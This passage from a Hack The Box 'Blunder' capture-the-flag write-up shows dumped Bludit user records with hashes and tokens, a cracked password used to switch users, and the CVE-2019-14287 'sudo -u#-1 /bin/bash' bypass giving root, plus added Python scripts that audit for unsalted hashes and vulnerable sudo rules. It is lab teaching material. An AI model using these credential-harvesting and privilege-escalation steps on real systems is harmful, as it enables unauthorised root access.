"lastName": "",
"nickname": "",
"description": "",
"role": "author",
"password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
"salt": "jqxpjfnv",
"email": "",
"registered": "2019-11-27 13:26:44",
"tokenRemember": "7192381e28f6bd412abe3d92a0c9144b",
"tokenAuth": "0e8011811356c0c5bd2211cba8c50471",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"codepen": "",
"instagram": "",
"github": "",
"gitlab": "",
"linkedin": "",
"mastodon": ""
}
}

21. The hashes were looked up at https://crackstation.net/, as recommended by the reference writeup.

22. However, enumerating the web server's root directory revealed another source tree, bludit-3.10.0a, and inside it the password hash of the user Hugo

www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ cd ../../
cd ../../
www-data@blunder:/var/www/bludit-3.9.2$ cd ../
cd ../
www-data@blunder:/var/www$ ls
ls
bludit-3.10.0a
bludit-3.9.2
html
www-data@blunder:/var/www$ cd bludit-3.10.0a
cd bludit-3.10.0a
www-data@blunder:/var/www/bludit-3.10.0a$ ls
ls
LICENSE
README.md
bl-content
bl-kernel
bl-languages
bl-plugins
bl-themes
index.php
install.php
www-data@blunder:/var/www/bludit-3.10.0a$ cd bl-content
cd bl-content
www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ ls
ls
databases
pages
tmp
uploads
workspaces
www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ cd databases
cd databases
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ ls
ls
categories.php
pages.php
plugins
security.php
site.php
syslog.php
tags.php
users.php
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$

23. https://crackstation.net/ cracked this hash as well: hugo:Password120

Hash	Type	Result
faca404fd5c0a31cf1897b823c695c85cffeb98d sha1 Password120
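Added example (not from the original writeup) tying steps 20 and 22-23 together: Bludit stores password hashes in bl-content/databases/users.php as sha1(password . salt), and the 3.10.0a record above has no salt field at all, which is why a plain SHA-1 lookup table recovers it while the salted 3.9.2 hashes resisted. The Python below parses the users.php layout shown above (from a constructed copy of the file) and flags unsalted entries and entries whose hash matches a constructed deny-list of weak passwords.

```python
import hashlib
import json


def bludit_hash(password, salt=""):
    """Bludit's scheme: sha1(password . salt). With no salt it is bare SHA-1."""
    return hashlib.sha1((password + salt).encode()).hexdigest()


# Constructed copy of a Bludit users.php in the layout seen on the box: a PHP guard
# line followed by a JSON object keyed by username. The "admin" record mirrors the
# unsalted Hugo entry from the 3.10.0a tree; "editor" is a made-up salted record.
SAMPLE_USERS_PHP = (
    "<?php defined('BLUDIT') or die('Bludit CMS.'); ?>\n"
    + json.dumps({
        "admin": {
            "nickname": "Hugo", "role": "User",
            "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
            "tokenAuth": "b380cb62057e9da47afce66b4615107d",
            "tokenAuthTTL": "2009-03-15 14:00",
        },
        "editor": {
            "nickname": "Editor", "role": "author",
            "password": bludit_hash("gravel-lantern-orbit-42", "x7q2pl9v"),
            "salt": "x7q2pl9v",
            "tokenAuth": "0" * 32,                      # constructed placeholder
            "tokenAuthTTL": "2009-03-15 14:00",
        },
    }, indent=2)
)

# Constructed deny-list; a real one would be the organisation's banned-password set.
WEAK_PASSWORDS = ["Password120", "admin", "password", "bludit"]


def load_users_db(text):
    """Strip the PHP guard line and parse the JSON body of users.php."""
    guard, _, body = text.partition("\n")
    if not guard.lstrip().startswith("<?php"):
        raise ValueError("not a Bludit database file: missing PHP guard line")
    return json.loads(body)


def audit_users(text, weak_passwords=WEAK_PASSWORDS):
    """Return {username: [findings]} for unsalted hashes and deny-listed passwords."""
    findings = {}
    for name, rec in load_users_db(text).items():
        issues = []
        salt = rec.get("salt", "")
        if not salt:
            issues.append("unsalted sha1: hash is directly reversible with a lookup table")
        # The salt must be used when checking candidates, otherwise salted entries
        # would never match even when the password itself is weak.
        for cand in weak_passwords:
            if bludit_hash(cand, salt) == rec.get("password"):
                issues.append(f"password matches deny-listed value {cand!r}")
        if issues:
            findings[name] = issues
    return findings


if __name__ == "__main__":
    for user, issues in audit_users(SAMPLE_USERS_PHP).items():
        for issue in issues:
            print(f"{user}: {issue}")
```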

24. From the initial shell, switch to the hugo user with su and read the first flag

www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ cd /home
cd /home
www-data@blunder:/home$ ls
ls
hugo
shaun
www-data@blunder:/home$ cd hugo
cd hugo
www-data@blunder:/home/hugo$ su hugo
su hugo
Password: Password120
ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
user.txt
Videos
cat user.txt
797b675b4fea870474989fadabb48ddc

0x02 Obtaining root access

25. Running sudo -l shows that we are not allowed to run bash as root

python3 -c 'import pty;pty.spawn("/bin/bash")'
hugo@blunder:~$

hugo@blunder:~$ sudo -l
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
hugo@blunder:~$

26. What is really being tested here is a vulnerability in sudo itself, so check its version

hugo@blunder:~$ sudo -V
sudo -V
Sudo version 1.8.25p1
Configure options:
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46

27. The reference writeup gives the details of this version

Once the sudo version is known, we also find CVE-2019-14287. This vulnerability lets a user bypass sudo's security policy and escalate privileges: a sudo user can run commands as root even when the configuration explicitly forbids it. A configuration of the form ALL=(ALL, !root) means the command may be run as ALL users, with root (and any other listed user) excluded.

The vulnerability is present in sudo versions below 1.8.28.

sudo 1.8.27 - Security Bypass : https://www.exploit-db.com/exploits/47502

sudo -u#-1 /bin/bash

When sudo is invoked this way it does not check whether the user exists, so it simply uses the supplied argument as the user to run as. Here -u specifies the target user, and #-1 ends up as 0, the UID of root itself.

Reference: https://juejin.cn/post/6844903967990775821

https://www.exploit-db.com/exploits/47502?source=post_page-----e39b2cfda153--------------------------------
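Added example, not from the original writeup: a small Python audit for the two conditions that together make the sudo -u#-1 trick work, a Runas spec of the form ALL with exclusions (like the (ALL, !root) rule above) and a sudo older than 1.8.28. The sudoers fragment and sudo -V text are constructed to mirror what sudo -l and sudo -V showed on the box.

```python
import re

# sudo 1.8.28 started rejecting a Runas user of "#-1" / "#4294967295". Older
# versions pass -1 to setresuid(), which means "leave unchanged", and since sudo
# already runs as root the command keeps UID 0 despite the !root exclusion.
FIXED_VERSION = (1, 8, 28, 0)

# Constructed sudoers fragment modelled on the rule seen in `sudo -l` on the box.
SAMPLE_SUDOERS = """\
Defaults        env_reset, mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root    ALL=(ALL:ALL) ALL
hugo    ALL=(ALL, !root) /bin/bash
shaun   ALL=(www-data) /usr/bin/systemctl restart apache2
%admin  ALL=(ALL) ALL
"""

# Constructed `sudo -V` output matching the version found on the box.
SAMPLE_VERSION = "Sudo version 1.8.25p1\nSudoers policy plugin version 1.8.25p1\n"

USER_SPEC_RE = re.compile(
    r"^\s*(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$"
)


def parse_sudo_version(text):
    """Pull the version out of `sudo -V` output: 'Sudo version 1.8.25p1' -> (1, 8, 25, 1)."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    if not m:
        raise ValueError("no sudo version found")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def sudo_vulnerable_to_14287(text):
    return parse_sudo_version(text) < FIXED_VERSION


def runas_is_bypassable(runas):
    """True for a Runas user list that grants ALL but excludes some users, e.g. 'ALL, !root'.

    The exclusion is what CVE-2019-14287 defeats: because ALL is permitted, an
    unchecked numeric UID of -1 is accepted, and the kernel treats it as UID 0.
    """
    users = runas.split(":", 1)[0]          # drop the Runas group part, if any
    entries = [e.strip() for e in users.split(",") if e.strip()]
    return "ALL" in entries and any(e.startswith("!") for e in entries)


def risky_user_specs(sudoers_text):
    """Yield (user, runas, cmds) for user specs whose Runas list is ALL-minus-exclusions."""
    for line in sudoers_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith(("#", "Defaults")) or "_Alias" in stripped:
            continue
        m = USER_SPEC_RE.match(line)
        if m and m.group("runas") and runas_is_bypassable(m.group("runas")):
            yield m.group("user"), m.group("runas").strip(), m.group("cmds").strip()


def audit(version_text, sudoers_text):
    """Findings only matter when both hold: a bypassable rule and a pre-1.8.28 sudo."""
    if not sudo_vulnerable_to_14287(version_text):
        return []
    return [{"user": u, "runas": r, "cmds": c} for u, r, c in risky_user_specs(sudoers_text)]


if __name__ == "__main__":
    for f in audit(SAMPLE_VERSION, SAMPLE_SUDOERS):
        print(f"{f['user']}: ({f['runas']}) {f['cmds']} -> root reachable via -u#-1; "
              "upgrade sudo to >= 1.8.28 or replace the exclusion with an explicit allow-list")
```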

28. Following the reference writeup, we obtain the final root flag

hugo@blunder:~$ sudo -u#-1 /bin/bash
id

id
pwd
sudo -u#-1 /bin/bash
root@blunder:/home/hugo# id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/home/hugo#
root@blunder:/home/hugo# id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/home/hugo# pwd
/home/hugo
root@blunder:/home/hugo# ls
ls
Desktop Downloads Pictures Templates Videos
Documents Music Public user.txt
root@blunder:/home/hugo# cd /root/
cd /root/
root@blunder:/root# cat root.txt
cat root.txt
83e1c4d114b7c7f6bbc91a17605270cf
root@blunder:/root#

0x03 Proof of completion

https://www.hackthebox.com/achievement/machine/1705469/254


Blunder-htb-writeup
https://sh1yan.top/2023/12/18/Blunder-htb-writeup/
Author: shiyan
Published: 18 December 2023